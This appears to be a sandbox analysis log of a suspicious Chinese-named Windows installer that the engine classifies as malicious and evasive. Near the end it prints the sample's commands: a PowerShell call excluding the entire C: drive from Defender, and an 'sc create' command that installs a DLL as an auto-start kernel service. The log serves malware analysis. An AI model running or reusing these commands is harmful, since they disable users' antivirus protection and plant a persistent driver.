Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CABC7F3 6_2_6CABC7F3
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA5C7CF 6_2_6CA5C7CF
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF67C0 6_2_6CAF67C0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADE0E0 6_2_6CADE0E0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD0020 6_2_6CAD0020
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAEC2A0 6_2_6CAEC2A0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE8200 6_2_6CAE8200
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF5D90 6_2_6CAF5D90
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAA7D43 6_2_6CAA7D43
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD3D50 6_2_6CAD3D50
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD9E80 6_2_6CAD9E80
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAB1F11 6_2_6CAB1F11
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAC589F 6_2_6CAC589F
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE78C8 6_2_6CAE78C8
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD99F0 6_2_6CAD99F0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD1AA0 6_2_6CAD1AA0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CACDAD0 6_2_6CACDAD0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CACFA50 6_2_6CACFA50
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA7540A 6_2_6CA7540A
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA9F5EC 6_2_6CA9F5EC
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADF5C0 6_2_6CADF5C0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD96E0 6_2_6CAD96E0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAEF640 6_2_6CAEF640
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CACB650 6_2_6CACB650
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF37C0 6_2_6CAF37C0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF9700 6_2_6CAF9700
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA73092 6_2_6CA73092
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADF050 6_2_6CADF050
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD71F0 6_2_6CAD71F0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADD280 6_2_6CADD280
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADD380 6_2_6CADD380
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE6AF0 6_2_6CAE6AF0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE3750 6_2_6CAE3750
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B381EC 10_2_00B381EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B781C0 10_2_00B781C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B64250 10_2_00B64250
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B88240 10_2_00B88240
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8C3C0 10_2_00B8C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B804C8 10_2_00B804C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B68650 10_2_00B68650
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6C950 10_2_00B6C950
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B40943 10_2_00B40943
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B68C20 10_2_00B68C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B84EA0 10_2_00B84EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B80E00 10_2_00B80E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B510AC 10_2_00B510AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B7D089 10_2_00B7D089
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B75180 10_2_00B75180
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6D1D0 10_2_00B6D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B891C0 10_2_00B891C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B81120 10_2_00B81120
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8D2C0 10_2_00B8D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B553F3 10_2_00B553F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF53CF 10_2_00AF53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B3D496 10_2_00B3D496
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B854D0 10_2_00B854D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8D470 10_2_00B8D470
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF1572 10_2_00AF1572
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B81550 10_2_00B81550
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B7D6A0 10_2_00B7D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B49652 10_2_00B49652
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF97CA 10_2_00AF97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B09766 10_2_00B09766
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8D9E0 10_2_00B8D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF1AA1 10_2_00AF1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B75E80 10_2_00B75E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B75F80 10_2_00B75F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B0E00A 10_2_00B0E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B722E0 10_2_00B722E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B92300 10_2_00B92300
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B5E49F 10_2_00B5E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B725F0 10_2_00B725F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6A6A0 10_2_00B6A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B666D0 10_2_00B666D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8E990 10_2_00B8E990
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B72A80 10_2_00B72A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B4AB11 10_2_00B4AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B76CE0 10_2_00B76CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B770D0 10_2_00B770D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6B180 10_2_00B6B180
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B5B121 10_2_00B5B121
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B87200 10_2_00B87200
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B7F3A0 10_2_00B7F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B1B3E4 10_2_00B1B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8F3C0 10_2_00B8F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B7F420 10_2_00B7F420
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B67410 10_2_00B67410
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8F599 10_2_00B8F599
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B83530 10_2_00B83530
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B9351A 10_2_00B9351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6F500 10_2_00B6F500
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B93601 10_2_00B93601
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B63790 10_2_00B63790
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B877C0 10_2_00B877C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B1F8E0 10_2_00B1F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6F910 10_2_00B6F910
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B77AF0 10_2_00B77AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B43AEF 10_2_00B43AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B0BAC9 10_2_00B0BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B0BC92 10_2_00B0BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B77C50 10_2_00B77C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6FDF0 10_2_00B6FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process token adjusted: Security Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: String function: 6CAF6F10 appears 728 times
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: String function: 6CA59240 appears 53 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 00B8FB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 00AF28E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 00AF1E40 appears 171 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080391705.000000007F23A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000000.2078119623.0000000000639000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080019112.00000000034AE000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr Binary string: \Device\TfKbMonPWLCache
Source: classification engine Classification label: mal88.evad.winEXE@134/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA25D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction, 6_2_6CA25D60
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 10_2_00AF9313
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B03D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 10_2_00B03D66
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW, 10_2_00AF9252
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA25240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW, 6_2_6CA25240
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Program Files (x86)\Windows NT\is-QJ471.tmp Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1264:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7092:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6004:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2212:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4416:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3608:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6500:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1472:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3056:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7140:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6516:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1268:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3012:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1600:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3396:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3656:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5780:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe File created: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Virustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20432,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20442,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
